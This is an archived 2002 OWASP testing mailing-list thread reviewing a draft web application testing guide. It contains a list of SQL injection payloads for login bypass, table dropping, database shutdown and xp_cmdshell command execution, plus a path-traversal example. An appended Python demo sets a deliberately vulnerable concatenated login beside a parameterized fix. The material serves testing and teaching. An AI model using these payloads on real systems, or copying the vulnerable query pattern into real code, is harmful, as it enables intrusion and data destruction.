[OWASP-TESTING] Paper review

Kartik Trivedi javapro13 at hotmail.com
Wed Dec 4 17:11:24 EST 2002


Hi David,

To start with, how does this look?

<head>Bypassing Authentication</head>
To authenticate without any credentials
         Username: ' OR "='
         Password: ' OR "='
To authenticate with just the username
        Username: admin'--
To authenticate as the first user in user's table
        Username: ' or 1=1--
To authenticate as a fictional user
        Username: ' union select 1, 'user', 'passwd' 1--

<head>Causing Destruction</head>
To drop a database table
     Username: ';drop table users--
To shutdown the database remotely
     Username: aaaaaaaaaaaaaaa'
     Password: '; shutdown--

<head>Executing Function calls and stored procedures</head>
Executing xp_cmdshell to get directory listing
 http://localhost/script?0';EXEC+master..xp_cmdshell+'dir';--
Executing xp_servicecontrol to manipulate services
 http://localhost/script?0';EXEC+master..xp_servicecontrol+'start',+'server';--


I am sure there is much more to add..

Thanks
Kartik

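An added example, not part of Kartik's draft or the OWASP paper: a minimal SQLite login check written two ways, the concatenated query that the `admin'--` and `' or 1=1--` payloads above bypass, and a parameterized version that treats the same input as a literal username. The table layout, sample users and passwords are constructed for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed in-memory users table; "admin" is deliberately the first row,
    # which is what the "first user in the table" payload ends up returning.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # Query built by string concatenation: quotes and the "--" comment marker
    # in the input become part of the SQL grammar, so the password clause can
    # be commented away or the WHERE clause made unconditionally true.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    # Bound parameters: the values travel separately from the statement text,
    # so "admin'--" is compared as a literal username and simply does not match.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    results = {}
    # Payloads from the draft section, each run against both implementations.
    results["admin_comment_vuln"] = login_vulnerable(conn, "admin'--", "anything")
    results["admin_comment_safe"] = login_parameterized(conn, "admin'--", "anything")
    results["or_1_1_vuln"] = login_vulnerable(conn, "' or 1=1--", "anything")
    results["or_1_1_safe"] = login_parameterized(conn, "' or 1=1--", "anything")
    # A legitimate credential pair still works through the parameterized path.
    results["legit_safe"] = login_parameterized(conn, "alice", "wonderland")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The stacked-query payloads in the draft (`';drop table users--`) are not shown because Python's sqlite3 `execute()` refuses to run more than one statement per call; whether stacked queries succeed depends on the database driver, not only on the query construction.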

----- Original Message -----
From: "David Endler" <DEndler at iDefense.com>
To: "'zeno'" <zeno at cgisecurity.net>
Cc: <owasp-testing at lists.sourceforge.net>
Sent: Wednesday, December 04, 2002 1:45 PM
Subject: RE: [OWASP-TESTING] Paper review


> Good feedback here far as well.  Sounds like you're saying we need more
> pretty pictures to keep people interested ;-)
>
> On another topic, does anyone feel comfortable making an attempt at SQL
> injection?
>
> -dave
>
> > -----Original Message-----
> > From: owasp-testing-admin at lists.sourceforge.net
> > [mailto:owasp-testing-admin at lists.sourceforge.net]On Behalf Of zeno
> > Sent: Tuesday, December 03, 2002 7:54 PM
> > To: David Endler
> > Cc: 'owasp-testing at lists.sourceforge.net'
> > Subject: [OWASP-TESTING] Paper review
> >
> >
> > Hola,
> >
> >
> > "Regulatory requirements"
> >
> > You wanted some examples of country regulations. Why don't we
> > mention crypto export limitations?
> > Great example that should be covered. Maybe something about
> > the bill passed in the 1990's about
> > illegal export of strong encryption outside the USA bla bla bla.
> >
> >
> > Moving on (nice graphs BTW :p)
> >
> > The image looks fine near the Intro to OWASP testing
> > methodology. Anyone else object?
> >
> > Interviewing the stakeholders is a nice touch.
> >
> > *maybe* have a flowchart containing "Obtaining documentation".
> >  People like pretty easy to understand pictures :)
> >
> >  Under obtaining source code perhaps mention that gaining
> > sourcecode via blackboxing may be possible.
> > A simple example could be exploiting a perl script and having
> > it load itself bah.pl?file=../bah.pl.
> > This can happen with other interpreted languages also like
> > ASP, perl, python, etc..
> > Nothing to talk too much in detail though.
> >
> > Under preparing tools in that list maybe we should mention
> > something in regards to checking
> > for permissions of files? File handle monitors seems broad
> > like "I am monitoring what is used" but
> > doesn't immediately ring the bell of "should check permissions
> > in regards to local, roaming, and public(everyone) users."
> >
> > Under listening http ports
> >
> > You give tips for checking ports 80 and 443. Perhaps mention
> > 8080 since it usually is a proxy port,
> > or alt webserver port. Perhaps "test for proxy usage" *maybe*
> >
> > Under server versioning I would include "http banner order,
> > default error pages, max connections, etc..)
> > I'm actually working on a NICE big detailed paper on
> > fingerprinting webservers. It will cover manually
> > and I hope for it to be rather extensive. (also see
> > whitehatsec.com blahat server fingerprinter tool)
> >
> >
> > HTTP Server extensions
> >
> > Also add apache modules to this. Seems a little too IIS'ish to me.
> >
> >
> > HTTP Methods supported
> >
> > You ask if we should provide examples on each. Obviously it
> > could be helpful. Perhaps include
> > HEAD, GET, and POST. As much as I'd like to learn more about
> > TRACE this document is a web security paper
> > and unless we dedicate
> > a lot of time (like lan mapping/cache networks) perhaps we
> > should limit it to the 3 most popular/used methods.
> >
> >
> > Old, Backup or un-referenced files
> >
> > Include that some editors create files like file.txt~ when
> > being edited. Perhaps include a general "editor" reference.
> >
> >
> > File extension Handling
> >
> > It mentions http://www.host.com. May want to do http://host/
> > for legal reasons? Same with rest of document.
> >
> >
> > Unsafe modules
> >
> > Everything from SQL access, usernames/passwords to sections
> > of your site, to paths to important files can be obtained
> > both locally, and in some cases(when specifically allowed) remotely.
> >
> > perhaps make (when specifically allowed, or misconfigured).
> > People don't say "Hey why don't I misconfigure
> > my machine for people to hack me with".
> >
> >
> > Page 38
> >
> > In this example we are going to send a request to a news
> > application which includes data from other file and displays it.
> >
> > I assume is
> >
> > "includes data from another file and displays it"
> >
> >
> > Direct OS commands
> >
> > Nice use of showing which functions to watch out for.
> >
> >
> >
> > I would also perhaps add more flowcharts or something along
> > those lines. Yeah it sounds silly but
> > when I'm reading a 60+ page document flowcharts are a nice
> > break and reiterate what I just read.
> > If I'm sounding like a moron just let me know I'm tired :p
> >
> > - bob
> >
> > ps: looks good
> >
> >
> >
> >
>
>